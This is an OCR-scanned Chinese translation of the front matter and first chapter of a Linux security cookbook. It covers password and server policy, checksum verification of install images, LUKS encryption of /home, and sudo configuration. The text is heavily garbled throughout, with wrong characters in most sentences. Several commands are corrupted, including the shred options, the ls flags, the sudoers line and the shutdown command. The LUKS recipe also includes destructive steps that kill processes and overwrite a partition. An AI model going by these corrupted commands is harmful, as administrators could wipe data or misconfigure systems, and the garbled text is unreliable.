Linux 是 个 开源 的 操作 系统 ， 以 模块 化 、 通 用 性 、 可 靠 性 、 可 扩展 性 著称 ,拥有 强大 的 社区 支持 。 其 开放 、 共 享 的 精神 持续 
吸引 着 众多 IT 精 天 投入 Linux 操 作 系 统 及 相关 应 用 的 开 友 之 中 ， 适 应 各 种 需求 的 平台 和 工具 不 断 推出 。 在 应 用 方面 ， 越 来 越 多 的 
服务 器 和 网 络 应 用 选择 Linux 作 为 运行 平台 。 据 国际 TOP500 组 织 公 布 ， 在 全 球 超级 计算 机 500 强 中 ，Linux 占 据 操 作 系统 的 
94.276。 


Linux 的 另 一 个 巨大 优势 束 是 它 的 安全 性 ， 它 被 认为 是 当今 世界 最 安全 的 操作 系统 。Linux 的 安全 性 得 益 于 它 的 如 下 特点 : f 
越 的 补丁 管理 工具 ， 可 以 在 目 动 更 新 系统 的 同时 升级 系统 中 所 有 的 软件 ;较为 健壮 的 默认 设置 和 权限 管理 ， 能 将 攻击 市 来 的 危害 
限定 在 一 定 学 围 内 ;模块 化 设计 ， 使 得 用 尸 可 以 选择 安 六 或 删除 任何 一 个 系统 组 件 ， 系 统 中 默认 整合 的 SELinux 等 安全 机 制 ， 能 
够 为 系统 提供 保护 ;开放 源 代码 构架 ， 能 更 容易 、 更 快速 地 友 现 和 修复 系统 的 安全 问题 等 。 


然而 ，Linux 毕 葛 是 一 个 通用 操作 系统 ， 为 了 满足 更 广泛 的 用 户 需 求 ，Linux 操 作 系 统 以 及 应 用 软件 都 提供 了 多 种 配置 参数 ， 
默认 的 设置 安全 性 还 不 够 。 管 理 员 应 该 根据 上 自己 的 安全 需求 ， 制 定 相 应 的 安全 策略 ， 运 用 各 种 命令 和 工具 进行 合理 的 配置 ， 并 对 
系统 的 运行 进行 监控 。 因 此 ，Linux 的 安全 性 最 终 取 决 于 管理 员 实 施 的 管理 措施 ， 管 理 员 有 责任 以 使 其 变 得 更 安全 的 方式 来 配置 
机 器 。 


本 书 以 提高 Linux 系 统 主 机 的 安全 性 为 目标 ， 从 内 核 配 置 、 文 件 系统 安全 、 安 全 认证 、 网 络 安全 以 及 Linux 上 的 安全 工具 等 多 
个 方面 ， 展 开 实 践 指导 。 书 中 没有 深奥 的 理论 或 者 高 级 的 设计 。 针 对 每 个 主题 ， 结 合 常见 任务 ， 用 简洁 的 步骤 描述 、 直 观 的 屏幕 
堆 图 和 详细 的 原理 解释 ， 人 循序 渐进 地 介绍 提高 Linux 系 统 安全 性 的 方法 。 书 中 内 容 读 起 来 容易 理解 ， 操 作 起 来 简单 易 行 ， 非 常 适 
合 于 自学 。 本 书 是 Linux 系 统 用 户 以 及 网 络 管理 人 员 学 习 加 固 上 自己 的 Linux 提 面 系统 和 服务 器 系统 的 不 二 选择 。 


Linux 的 安全 是 个 庞大 的 主题 ， 尽 管 本 书 作者 对 书 的 主题 及 内 容 进 行 了 取舍 ， 但 涉及 的 主题 仍 十 分 广泛 。 作 为 本 书 的 翻译 人 
员 ， 我 们 的 原则 是 保证 译文 能 反映 作者 的 真实 意图 ， 同 时 力求 以 通俗 的 语言 进行 有 效 表 达 ;， 对 于 涉及 的 命令 、 软 件 工 具 、 专 业 术 
到 等， 我 们 参考 国内 同行 在 Linux 系 统 及 信息 安全 领域 的 习惯 用 法 进行 相应 的 翻译 ;对 于 一 些 普 通用 户 可 能 不 熟悉 的 关键 术语 或 
命令 ， 我 们 增加 了 适当 的 译 者 注 ， 希 望 这 些 译 者 注 能 在 你 遇 到 困难 时 助 你 茅 塞 顿 开 。 


本 书 是 一 本 操作 性 、 实 战 类 书籍 。 实 践 出 真得， 读者 在学 习 过 程 中 一 定 要 目 己 实际 动手 来 操作 ， 才 能 体会 每 个 步骤 的 细 闻 要 
求 ， 理 解 每 种 方法 的 作用 。 书 中 的 每 种 万 法 按照 准备 工作 、 操 作 指 南 和 原理 解析 三 部 分 进行 说 明 。 其 中 ， 准 备 工 作 部 分 是 应 用 方 
法 的 前 提 ， 而 原理 解析 部 分 是 对 万 法 进一步 的 解释 ， 操 作 指 南部 分 以 文字 说 明 、 命 令 展示 以 及 屏幕 截图 的 万 式 说明 万 法 的 详细 步 
又 。 读 者 在 应 用 某 个 万 法 时 ， 应 设法 满足 方法 的 前 提 条 件 ， 遵 循 步骤 的 要 求 ， 其 中 的 一 些 参数 可 能 需要 根据 实际 情况 进行 调整 。 
此 外 ， 根 据 我 们 的 使 用 经 验 ， 书 中 部 分 方法 的 细节 操作 可 能 特定 于 某 个 版 本 ， 而 由 于 Linux 系 统 及 软件 的 版 本 友 展 非常 快 ， 读 者 
使 用 的 软件 版 本 可 能 不 同 ， 这 时 读者 可 以 参照 书 中 的 步骤 ， 根 据 上 自己 的 实际 版 本 进行 对 应 性 调整 。 我 们 相信 ， 只 要 你 遵循 了 操作 


步骤 和 要 求 ， 就 一 定 能 得 到 预期 的 结果 。 

本 书 的 第 1 和 2 章 由 刘海 茂 翻 译 ， 第 3 和 4 章 由 常 成 翻译 ， 第 5 和 6 章 由 李 卑 翻译 ， 第 7 和 8 章 由 王政 翻译 ， 第 9 和 10 章 由 武 卉 明 
翻译 ， 其 余部 分 均 由 刘海 燕 翻 译 ， 全 书 由 刘海 惹 统 稿 和 修改 。 因 水 平和 时 间 所 限 ， 译 文 在 理解 和 表述 方面 难免 存在 不 当 之 处 ， 请 
读者 批评 指正 。 


在 建 YLinux 系 统 时 ， 安 全 性 在 各 个 阶段 都 被 认为 是 重要 部 分 。 通 晓 Linux 的 基本 知识 对 在 机 器 上 实现 民 好 的 安全 策略 至 和 天 重 
32, 


Linux 系 统 的 安全 性 不 是 天 生 束 完美 的 ， 因 而 ， 管 理 员 有 责任 以 使 其 变 得 更 安全 的 方式 来 配置 它 。 
本 书 是 帮助 管理 员 配 置 更 安全 的 机 器 的 实用 指南 。 


如 果 你 想 了 解 Linux 的 内 核 配 置 、 文 件 系 统 安全 、 安 全 认证 、 网 络 安全 以 及 Linux 上 的 各 种 安全 工具 ， 那 么 本 书 丈 能 满足 你 的 


Linux 安 全 是 一 个 庞大 的 主题 ， 仅 用 一 本 书 不 足以 肖 兰 所 有 的 内 容 。 不 过 ， 本 书 仍 将 提供 很 多 方法 来 帮助 你 加 固 机 器 。 
本 书 主要 内 容 


第 1 章 ，” 涵 兰 Linux 有 关 的 各 种 漏洞 及 利用 ， 还 讨论 了 应 对 这 些 漏洞 的 安全 方法 。 内 容 包括 制定 安 人 全集 略 并 进行 安全 控制 以 
用 于 口令 保护 和 服务 器 安全 ， 对 Linux 系 统 进行 脆弱 性 评估 。 本 章 还 将 讨论 sudo 访 问 的 配置 方法 。 


第 2 章 ”重点 介绍 Linux 内 核 的 配置 和 构建 过 程 以 及 它 的 测试 。 内 容 包 括 构建 内 核 的 要 求 、 配 置 内 核 、 安 装 内 核 、 定 制 内 核 
以 及 内 核 的 调试 等 。 本 章 还 将 讨论 如 何 使 用 Netconsole 配 置 一 个 控制 合 。 


第 3 草 ”着 眼 于 Linux 系 统 的 文件 结构 和 访问 权限 。 内 容 包 括 查 看 文件 和 目录 的 详细 信息 、 使 用 chmod 处 理 文 件 和 文件 访问 
权限 、 实 现 访问 控制 列表 等 。 本 章 还 将 向 读者 介绍 LDAP 的 配置 。 


第 4 章 ”探讨 安全 的 本 地 系统 用 户 认证 。 内 容 包括 用 户 认 证 的 日 志 记录 、 限 制 用 户 的 登录 能 力 、 监 视 用户 行 为 、 定 义 授权 控 
制 以 及 如 何 使 用 PAM。 


第 5 章 ”讨论 Linux 系 统 的 远程 用 户 认证 。 内 容 包 括 使 用 SSH 远 程 访问 服务 器 、 禁 用 和 启用 root 用 户 登 录 、 限 制 使 用 SSH 时 的 
远程 访问 、 通 过 SSH 远 程 复制 文件 以 及 设置 Kerberos。 


556: ”讨论 关于 网 络 攻击 和 网 络 安全 的 问题 。 内 容 包 括 管 理 TCP/IP 网 络 、 使 用 iptables 配 置 防火 墙 、 阻 止 伪造 地 址 和 不 需 
要 的 入 站 流量 等 。 本 草 还 将 介绍 TCP Wrapper 的 配置 和 使 用 。 


第 / 草 ”介绍 可 用 于 Linux 系 统 的 各 种 安全 工具 或 软件 。 涉 及 的 工具 包括 sXid、PortSentry、Squid 代 理 服务 器 、OpenSSL 服 


务 器 、Tripwire 和 Shorewall。 


第 8 章 ”介绍 与 安全 和 渗透 测试 有 关 的 几 个 著名 的 Linux/UNIX 发 行 版 本 ,包括 Kali Linux、pfSense、DEFT、NST 以 及 


Helix, 


第 9 草  WRiJerHbash shel| 漏 洞 一 一 Shellshock。 本 草 将 介绍 什么 是 Shellshock 漏 洞 以 及 该 漏洞 可 能 引起 的 安全 问题 ， 
同时 告诉 读者 如 何 使 用 Linux 补 丁 管理 系 统 来 加 固 自己 的 机 器 ， 以 及 在 Linux 系 统 中 补丁 是 如 何 应 用 的 。 


第 10 章 ”介绍 Linux 的 本 地 系统 及 网 络 的 监控 问题 。 内 容 包括 使 用 Logcheck 监 控 日 志 、 使 用 Nmap 监 控 网 络 、 使 用 Glances 
监控 系统 以 及 使 用 M ultiTail 监 控 日 志 。 本 章 还 将 讨论 一 些 其 他 的 工具 ， 包 括 Whowatch、stat、lsof、strace 和 Lynis 等 。 


学 习 本 书 的 要 求 


为 了 充分 上 友 挥 本 书 的 作用 ， 读 者 应 该 对 Linux 的 文件 系统 和 管理 有 基本 的 了 解 ， 应 该 知道 Linux 的 基本 命令 ， 如 果 有 一 些 信息 
安全 的 知识 则 更 佳 。 


本 书包 括 基于 Linux 系 统 内 置 工 具 以 及 其 他 一 些 开源 工具 进行 安全 管理 的 例子 。 对 每 一 种 方法 ， 如 果 所 用 的 工具 在 Linux 上 还 
没有 安 疼 ， 那 么 请 读者 务必 要 安 妆 它们 。 


本 书 的 目标 读者 


本 书面 向 所 有 已 经 了 解 Linux 文 件 系 统 及 管理 的 Linux 用 户 。 读 者 应 该 熟悉 Linux 的 基本 命令 ， 理 解 信 息 安 全 知识 以 及 Linux 系 
统 的 安全 风险 也 有 助 于 理解 书 中 的 方法 。 


然而 ， 即 使 你 对 信息 安全 不 熟悉 ， 也 能 够 很 容易 地 遵照 执行 和 理解 书 中 讨论 的 方法 。 因 为 本 书 遵循 了 实用 性 原则 ， 按 照 步 又 
进行 操作 非常 容易 。 
内 容 分 节 


本 书 中 ， 你 会 上 友 现 一 些 标 题 出 现 的 频率 很 高 ， 如 准备 工作 、 操 作 捐 南 、 原 理解 析 、 扫 展 学 习 、 延 伸 阅 读 等 。 


为 了 更 清楚 地 说 明 如 何 实现 一 种 方法 ， 我 们 使 用 了 如 下 几 个 标题 。 


该 部 分 告诉 读者 本 方法 的 目标 ， 描 述 如 何 设置 软件 以 及 本 方法 要 求 哪些 预先 设置 。 


操作 指南 


该 部 分 包括 实现 本 方法 所 需 的 步 又 


原理 解析 


该 部 分 通 弟 包括 对 操作 指南 部 分 所 友 生 情 况 的 详细 解释 。 


xí 
S 
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为 使 读者 对 本 方法 有 更 多 了 解 而 提供 的 附加 信息 。 


延伸 阅读 


该 部 分 为 其 他 有 用 信息 提供 帮助 链接 。 


下 载 彩 图 


我 们 还 为 你 提供 了 一 个 PDF 文件 ， 里 面 有 书 中 用 到 的 屏幕 截图 和 图 表 的 彩色 图 像 。 彩 色 的 图 像 将 帮助 你 更 好 地 理解 输出 中 的 
变化 。 


你 可 以 从 下 述 地 址 下 载 此 文 
f: http://www.packtpub.com/sites/default/files/downloads/PracticalLinuxSecurityCookbook Coloredlmages.pdf, 


第 1 音 ”Linux 的 安全 问题 


本 章 将 讨论 如 下 主题 : 
Linux 的 安全 策略 
- 配置 口令 保护 
- 配置 服务 器 安全 
-使 用 校 验 和 检测 安装 介质 的 完整 性 
- 使 用 LUKS 加 密 磁 盘 
- 配置 sudo 访 问 
- 使 用 Nmap 扫 描 主 机 


- 获取 脆弱 Linux 系 统 的 root 权 限 


一 个 Linux 系 统 的 安全 性 取决 于 管理 员 对 它 的 配置 。 在 安装 完 Linux 系 统 并 删除 所 有 不 必要 的 软件 包 之 后 ， 我 们 就 可 以 开始 处 
理 Linux 上 软件 及 服务 的 安全 问题 了 。 


1.2 ”Linux 的 安全 策略 

安全 策略 是 指 为 保证 一 个 组 织 的 计算 机 网 络 安全 而 必须 遵循 的 规则 及 实践 。 它 还 定义 了 组 织 如 何 管理 、 保 护 以 及 发 布 敏感 数 
je. 

那么 ， 如 何 制定 安全 策略 呢 ? 

在 创建 安全 策略 时 ， 我 们 应 该 确保 安全 策略 简单 易 用 。 策 略 的 目标 应 该 是 保护 数据 ， 同 时 维护 用 户 隐私 的 完好 ， 


安全 策略 的 制定 应 围绕 如 下 几 操 : 


` 对 系统 的 访问 能 力 
-系统 上 人 安 帮 软件 的 权限 
数据 的 访问 权限 

- 从 故障 中 恢复 的 方法 


在 设计 安全 策略 时 ， 应 保证 一 个 用 尸 仪 能 使 用 那些 已 经 授权 的 服务 ， 任 何不 允许 的 操作 都 应 该 在 策略 中 进行 限制 。 


1.3” 配 转口 令 保 护 


在 任何 系统 中 ， 口 令 对 安全 性 都 起 着 非常 重要 的 作用 。 不 好 的 口令 可 能 会 导致 组 织 的 资源 受到 损害 。 为 此 ， 组 织 中 的 每 个 
人 ， 无 论 是 普通 用 户 还 是 管理 员 ， 都 应 该 遭 守 口 令 保护 策略 。 
操作 指南 

下 面 给 出 一 些 在 选择 口令 或 加 固 口 令 时 必须 遭 循 的 规则 : 

口令 的 创建 策略 应 遵循 如 下 规则 : 

一 个 用 户 在 组 织 中 的 所 有 账号 不 能 使 用 相同 的 口令 。 

- 所 有 与 访问 相关 的 口令 都 应 该 互 不 相同 。 

当 同 一 个 用 户 既 有 系统 级 账号 又 有 普通 账号 时 ， 系 统 级 账号 的 口令 一 定 与 其 他 账号 的 口令 不 同 。 

口令 的 保护 策略 应 遵循 如 下 规则 : 

口令 应 该 被 看 作 敏感 和 机 密 的 信息 ， 因 此 不 能 与 任何 人 分 享 。 

` 不 应 该 通过 任何 电子 通信 工具 (如 电子 邮件 ) 共享 口令 。 

C 永远 不 要 在 手机 上 或 者 调查 问卷 中 透露 口令 。 

: 不 要 使 用 能 向 攻击 者 提供 线索 的 口令 提示 。 

: 不 要 与 任何 人 分 享 公司 的 口令 ， 包 括 行政 人 员 、 管 理 者 、 同 事 ， 甚 至 家 庭 成 员 。 

` 不 要 将 口令 以 书面 形式 存储 在 办 公 室 的 任何 地 方 。 如 果 将 口令 存储 在 移动 设备 上 ， 那 么 一 定 要 进行 加 密 。 

` 不 要 使 用 应 用 程序 的 口令 记忆 功能 。 

- 如 果 怀 疑 口令 可 能 被 泄露 ， 那么 要 尽早 上 报 安 全 事件 并 更 改口 令 。 

口令 的 更 改 策 略 应 遵循 以 下 规则 : 


- 所 有 用 户 和 管理 员 必 须 定期 更 改口 令 ， 至少 每 季度 修改 一 次 。 


- 组 织 的 安全 审计 人 员 必 须 进 行 随机 检查 ， 检 查 任 何 用 户 的 口令 是 否 能 够 被 猿 出 或 者 被 破解 。 


原理 解析 


在 创建 或 更 改口 令 时 遵循 上 述 规划， 可 以 确保 口令 不 那么 容易 被 猿 出 来 或 被 破解 。 


1.4 配置 服务 器 安全 


Linux 服 务 器 仓 企 恶意 攻击 的 一 个 主要 原因 是 安全 实施 不 当 或 者 仓 企 漏洞 。 在 配置 服务 器 时 ， 需 要 正确 地 执行 安全 集 略 ， 而 
且 ， 为 了 正确 地 配置 服务 器 ， 需 要 接管 系统 的 上 所有权。 


操作 指南 


通用 策略 如 下 : 


. 管理 一 个 组 织 内 的 所 有 服务 器 是 专门 团队 的 职责 ， 它 还 应 该 负责 监视 任何 形式 的 违规 行为 。 如 果 发 生 了 任何 违规 情况 ， 访 
团队 应 该 相应 地 执行 或 审查 安全 策略 。 


. 在 配置 内 部 服务 器 时 ， 必 须 登 记 并 确定 它们 的 下 列 信息 : 
- 服务 器 的 位 置 
- 操作 系统 的 版 本 及 其 硬件 配置 
` 正在 运行 的 服务 和 应 用 程序 
“ 管理 系统 中 的 任何 信息 必须 始终 保持 最 新 状态 。 
配置 策略 如 下 : 
- 服务 器 的 操作 系统 应 按照 信息 安全 团队 认可 的 指导 方针 进行 配置 。 
- 任何 不 使 用 的 服务 和 应 用 程序 ， 如 果 可 能 的 话 都 应 该 被 茶 用 。 


对 服务 器 上 所 有 服务 和 应 用 程序 的 访问 都 应 该 被 监视 并 记录 ， 而 且 它 们 还 应 该 通过 访问 控制 方法 进行 保护 。 本 书 第 3 章 将 
介绍 一 个 这 样 的 示例 。 

- 系统 应 保持 更 新 ， 任 何 可 用 的 新 安全 补丁 都 应 该 尽早 安装 。 

: 尽量 避免 使 用 root 账 号 。 最 好 使 用 “最 小 权限 ”安全 原则 ， 即 仅 授予 执行 一 项 功能 所 需要 的 最 小 权限 。 
- 任何 特权 访问 都 应 该 尽 可 能 通过 安全 信道 连接 (如 SSH) 。 


服务 器 的 访问 应 该 在 受 控 环境 中 进行 。 


监控 策略 如 下 : 


: 服务 器 系统 中 所 有 与 安全 相关 的 操作 都 必须 记录 下 来 ， 并 且 按 如 下 方式 保存 审计 报告 : 

` 1 个 月 之 内 ， 所 有 安全 相关 的 日 志 应 在 线 保留 

` 1 个 月 之 内 ， 每 日 的 备份 和 每 周 的 备份 都 应 该 留存 

“至少 2 年 之 内 ， 每 月 的 备份 都 应 留存 

- 任何 破坏 安全 的 事件 都 应 该 报告 给 信息 安全 团队 ， 他 们 将 审查 日 志 ， 并 把 事件 上 报 给 IT 部 门 。 
下 面 给 出 几 个 安全 相关 事件 的 示例 : 

E 端口 扫描 有 关 的 攻击 

© 未 经 授权 访问 特权 账号 


: 由 于 主机 上 出 现 菜 特定 应 用 程序 而 导致 的 异常 事件 


原理 解析 


在 对 组 织 拥有 的 或 者 组 织 所 运行 的 内 部 服务 器 进行 基本 配置 时 ， 要 遵循 前 面 提 人 到 的 有 关 策 略 。 有 效 地 执行 这 些 策略 ， 将 会 减 
少 对 敏感 信息 及 私有 信息 的 任何 非 授权 访问 。 


拓展 学 习 


当 谈 论 Linux 的 安全 时 ， 我 们 还 有 更 多 的 事情 需要 去 探究 。 


1.5 “安全 控制 


当 我 们 讨论 保护 Linux 机 器 时 ， 通 常 忌 是 从 一 个 时 在 加 固 系 统 的 检查 清音 开始。 检查 清单 能 够 保证 ， 只 要 遵循 该 清单 ， 束 可 
以 确认 主机 是 否 已 经 实施 了 适当 的 安全 控制 。 


1.6 ”使 用 校 验 和 检测 安 委 介质 的 完整 性 


当 我 们 下 载 任何 Linux 发 行 版 的 映像 文件 时 ， 应 该 检查 它 的 正确 性 和 安全 性 由 。 这 可 以 通过 对 下 载 后 的 映像 文件 计算 MD5 校 
验 和 [站 ， 并 把 它 与 正确 映像 文件 的 校 验 和 进行 比 对 来 实现 。 


校 验 和 可 用 于 检查 一 个 文件 的 完整 性 ， 因 为 对 文件 的 任何 修改 都 会 使 MD5 哈 希 值 友 生变 化 。 


一 旦 下 载 文 件 被 修改 ， 通 过 MD5 哈 希 值 比较 束 可 以 检测 出 来 。 文 件 越 大 ， 被 修改 的 可 能 性 也 越 大 。 因 此 我 们 强烈 建议 对 外 
来 的 文件 (如 光盘 上 的 操作 系统 安装 文件 等 ) 做 MD5 哈 希 值 比较 。 


准备 工作 


通常 ， 大 多 数 Linux 发 行 版 中 都 已 经 安 法 了 MD5 校 验 和 工具 ， 所 以 不 需要 额外 安 闪 。 


操作 指南 


1. 首 先 ， 打 开 Linux 终 端 ， 执 行 命令 ubuntuQ@ubuntu-desktop: ~$cd Downloads， 将 当前 目录 更 换 到 包含 下 载 的 I1SO 文 
件 的 目录 (本 示例 中 ， 假 设 下 载 文件 所 在 的 目录 为 Downloads) 。 


am 


x 一 注意 : Linux 系 统 是 大 小 写 敏 感 的 ， 因 此 输入 目录 名 称 时 一 定 要 拼写 正确 ， 例 如 Downloads 5 downloads 4E Linux P J£ 4 [5] 87 
H Ko 


2. 改 变 目 录 到 Downloads 目 录 之 后 ， 输 入 如 下 命令 : 


md5sum ubuntu-filename.iso 


这 里 的 ubuntu-filename.iso 是 下 载 的 映像 文件 的 名 称 。 


3.md5sum 命 令 将 在 屏 绑 上 输出 撒 定 文件 的 MD5 哈 希 值 ， 如 下 所 示 : 


8044d756b7£00b695ab8dce07dce43e5 ubuntu-filename.iso 


把 上 述 计算 结果 与 UbuntuHashes 页 面 上 给 出 的 哈 希 值 进行 比较 。 打 开 UbuntuHashes 页 面 
(https://help.ubuntu.com/community/UbuntuHashes) ， 把 上 述 计算 的 哈 希 值 复制 到 浏览 器 的 查找 框 ( 按 <Ctrl+F> 键 可 
弹出 浏 史 器 的 查找 框 ) . 


原理 解析 

如 果 计 算出 的 哈 希 值 与 UbuntuHashes 页 面 给 出 的 哈 希 值 匹 配 ， 那 么 可 以 确定 下 载 的 文件 没有 损坏 。 如 果 哈 希 值 不 匹配 ， 则 
可 能 是 下 载 的 文件 有 问题 ， 也 可 能 是 下 载 服务 器 有 问题 。 试 着 再 次 下 载 文件 ， 如 果 问 题 仍 存在 ， 那 么 建议 你 将 问题 报告 给 服务 器 
的 管理 人 员 。 


拓展 学 习 


如 果 你 想 多 学 一 点 知识 ， 那 么 可 以 尝试 Ubuntu 上 提供 的 图 形 用 户 界面 的 校 验 和 计算 器 。 


有 时 ， 在 终端 上 执行 校 验 和 计算 确实 不 太 方便 。 你 需要 知道 下 载 文件 所 在 的 目录 以 及 确切 的 文件 名 ， 要 记 住 确 切 的 命令 内 容 
有 些 困难 。 为 解决 这 个 问题 ， 可 以 使 用 一 款 叫 作 GtkHash 的 小 工具 。 你 可 以 用 如 下 命令 从 http://gtkhash.sourceforge.net/ 下 
载 并 安装 它 : 


sudo apt-get install gtkhash 


[1] 如 果 安 装 文件 被 动 了 手脚 ， 如 被 内 置 了 病毒 、 木 马 等 恶意 程序 ， 那 么 安装 的 系统 本 身 就 不 安全 。 译 者 注 
[2] MD5 (Message Digest 5) 是 一 种 哈 布 算法 ， 对 任何 大 小 的 输入 通过 运算 输出 128 位 的 哈 布 值 。 译 者 注 


1.7 ”使 用 LUKS 加 密 磁 盘 


在 某 些 企业 (如 小 型 公司 或 政府 机 关 ) ， 用 户 可 能 需要 加 固 系统 以 保护 私人 数据 ， 包 括 客 户 的 详细 资料 、 重 要 文件 、 联 系 方 
式 等 。 为 此 ，Linux 提 供 了 大 量 的 加 密 技术 ， 可 用 于 保护 物理 设备 (如 硬盘 或 可 移动 介质 ) 上 的 数据 。 其 中 ，Linux 统 一 密 钥 设 置 
(Linux Unified Key Setup, LUKS) 残 是 这 样 一 个 加 密 技术 ， 它 允许 对 Linux 的 分 区 进行 加 密 。 


LUKS 具 有 如 下 功能 : 
:可 以 使 用 LUKS 加 客 整 个 块 设备 ， 非 常 适合 于 保护 可 移动 存储 介质 或 笔记 本 磁 绍 的 数据 。 
:一旦 被 加 密 ， 块 设备 上 的 内 容 看 起 来 就 像 是 随机 的 ， 所 以 它 对 于 交换 设备 的 加 窗 非 常 有 用 。 
:LUKS 使 用 了 现 有 的 设备 映射 内 核子 系统 。 
“ 它 提 供 了 一 个 窗 码 加 强 器 ， 有 助 于 防止 针对 客 码 的 字典 攻击 。 


准备 工作 


为 完成 下 述 操 作 ， 要 求 在 安 半 Linux 系 统 时 必须 将 /home 目 录 创 建 在 单独 的 分 区 上 。 


RET : 按照 如 下 步骤 配置 LUKS 时 ， 将 删除 加 客 分 区 上 的 所 有 数据 。 因 此 ， 在 开始 使 用 LUKS 之 前 ， 一 定 要 将 数据 备份 到 
外 部 资源 上 。 


操作 指南 


按 如 下 步骤 对 目录 进行 手动 加 密 : 


1. 转 换 到 运行 级 别 1。 在 shell 提 示 符 或 终 记 上 键入 以 下 命令 : 
telinit 1 


2. 使 用 如 下 命令 卸载 当前 的 /home 分 区 : 
umount /home 


3. 如 果 有 其 他 进程 正在 控制 /home 目 录 ， 那 么 上 述 命令 会 执行 失败 。 这 时 ， 可 使 用 如 下 所 示 的 fuser 命 令 查 找 并 杀 死 这 样 的 


进程 : 
fuser -mvk /home 


4. 执 行 如 下 命令 检查 并 确保 /home 分 区 当前 没有 被 挂 载 : 


grep home /proc/mounts 
5. 现 在， 在 分 区 中 放 入 一 些 随机 数据 : 
shred -v --iterations-1 /dev/MYDisk/home 


这 里 的 MYDisk 是 磁盘 的 设备 名 。 
6. 上 述 命令 可 能 需要 一 些 时 间 才 能 完成 ， 所 以 要 有 耐心。 时 间 长 短 取决 于 你 设备 的 写 入 速度 。 
7. 一 旦 上 述 命令 执行 完毕 ， 则 初始 化 分 区 : 


cryptsetup --verbose --verify-passphrase luksFormat /dev/MYDisk/ 
home 


8. 打 开 新 创建 的 加 密 分 区 : 


cryptsetup luksOpen /dev/MYDisk/home 

9 检查 并 确认 设备 是 否 存在 : 

ls -l1 /dev/mapper | grep home 
10. 现 在 ， 创 建文 件 系统 : 

mkfs.ext3 /dev/mapper/home 

11. 然 后 ， 挂 载 新 的 文件 系统 : 

mount /dev/mapper/home /home 

12. 确 认 文 件 系 统 仍然 是 可 见 的 : 


df -h | grep home 


13. 在 /etc/crypttab 文 件 输入 如 下 一 行 : 


home /dev/MYDisk/home none 


14. 修 改 /etc/fstab 文 件 ， 删 除 /home 所 在 的 行 ， 并 增加 如 下 一 行 : 


/dev/mapper/home /home ext3 defaults 1 2 

15. 上 述 命令 完成 后 ， 执 行 如 下 命令 来 恢复 默认 的 SELinux 安 全 设置 : 

/sbin/restorecon -v -R /home 

16. 重 新 局 动机 器 : 

shutdown - now 

17. 重 局 后 ， 系 统 会 提示 我 们 输入 LUKS 密 码 。 现 在 你 可 以 以 root 用 户 身份 登录 并 恢复 你 的 备份 了 。 

fuos! 你 已 成 功 地 创建 了 一 个 加 密 分 区 。 现 在 可 以 保证 ， 即 使 天 机 的 情况 下 他 人 拿 到 了 磁盘 ， 你 的 所 有 数据 仍然 是 安全 的 。 
原理 解析 


我 们 首先 进入 运行 级 别 1 并 外 载 /home 分 区 。 钾 载 之 后 ， 向 /home 分 区 添加 了 一 些 随机 数据 。 然 后 ， 初 始 化 该 分 区 ， 并 使 用 


cryptsetup 命 令 来 加 密 它 。 


一 旦 加 密 完 成 ， 我 们 就 重新 挂 载 文件 系统 ， 然 后 在 /etc/crypttab 文 件 中 添加 一 个 条 目 。 另 外 ， 还 要 编辑 /etc/fstab 文 件 来 添 
加 加 密 分 区 的 入 口 。 


所 有 步骤 完成 之 后 ， 我 们 恢复 了 SELinux 的 默认 设置 。 


从 此 以 后 ， 系 统 每 次 局 动 时 都 会 询问 LUKS 的 密码 。 


1.8 配置 sudo 访 问 


如 果 系 统管 理 员 和 希望 向 可 信 的 用 户 提供 管理 员 访问 权限 ， 但 又 不 想 共 享 root 用 户 的 口令 ， 那 么 可 以 使 用 sudo 机 制 。 


用 户 一 旦 通过 sudo 机 制 获得 了 给 定 权限 ， 丈 可 以 执行 任何 管理 命令 ， 只 需 企 命令 前 面 加 上 sudo 天 键 字 即 可 。 在 使 用 sudo 
时 ， 用 户 会 裤 要 求 输入 目 己 的 口令 ， 口 令 正 确 之 后 ， 管 理 命 令 的 执行 与 root 用 户 执行 该 命令 时 完全 相同 。 


准备 工作 
由 于 配置 文件 是 预定 义 的 ， 而 命令 是 内 置 的 ， 因 此 ， 在 开始 以 下 步骤 之 前 不 需要 做 任何 额外 的 配置 。 
操作 指南 


1. 首 先 创建 一 个 普通 账号 ， 然 后 赋予 它 使 用 sudo 的 权限 。 之 后 ， 新 账号 用 户 将 可 以 使 用 sudo， 并 能 执行 管理 命令 。 下 面 给 
出 配置 sudo 访 问 的 步骤 : 


首先 ， 使 用 root 账 号 登录 系统 。 然 后 ， 使 用 useradd 命 令 创 建 一 个 新 的 用 尸 账号 ， 如 下 图 所 示 : 


i useradd USERNAME 


将 上 述 指令 中 的 USERNAME 茶 换 成 你 喜欢 的 任何 用 户 名 。 
2. 使 用 passwd 命 令 为 新 用 户 账 号 设置 口令 。 


# passwd USERNAME 

Changing password for user USERNAME. 

New password: 

Retype new password: 

passwd: all authentication tokens updated successfully. 


3. 运 行 visudo 工 具 编辑 /etc 人 sudoers 文 件 。sudo 命 令 应 用 的 安全 策略 定义 在 /etc/sudoers 文 件 中 。 


4. 打 开 /etc/sudoers 文 件 后 ， 找 到 如 下 所 示 的 行 ， 该 行 显示 sudo 权 限 被 授予 了 test 组 的 用 户 。 


$$ Allows people in group test to run all commands 


] test ALL- (ALL) 


5. 删 除 行 首 的 注释 符 GE) ， 则 该 行 的 配置 将 局 用 。 修 改 文件 后 ， 保 存 文件 并 退出 编辑 器 。 现 在 ,使 用 usermod 命 令 将 上 面 
创建 的 用 户 添 加 到 test 组 。 


i usermod -aG test USERNAME 


6. 我 们 需要 检查 上 面 截图 所 示 的 配置 文件 是 否 允 许 新 用 尸 执 行 Sudo 命 令 。 


7. 使 用 su 命令 切换 到 新 创建 的 账号 。 


# su USERNAME - 


8. 使 用 groups 命 令 来 确认 新 用 户 是 否 在 test 组 中 。 


$ groups 


USERNAME test 


最 后 ， 从 新 账号 中 运行 sudo whoami 命 令 。 由 于 我 们 是 首次 使 用 sudo 执 行 命令 ， 因 此 会 显示 sudo 默 认 的 标识 信息 ， 屏 幕 
上 还 会 提示 输入 用 户 账号 对 应 的 口令 。 


$ sudo whoami 
We trust you have received the usual lecture from the local System 
Administrator. It usually boils down to these three things: 


#1) Respect the privacy of others. 
#2) Think before you type. 
#3) With great power comes great responsibility. 


[sudo] password for USERNAME : 
root 


9. 上 述 输出 的 最 后 一 行 是 whoami 命 令 返 回 的 用 尸 名 。 如 果 sudo 配 置 正确 ， 那 么 这 个 值 应 该 是 root。 


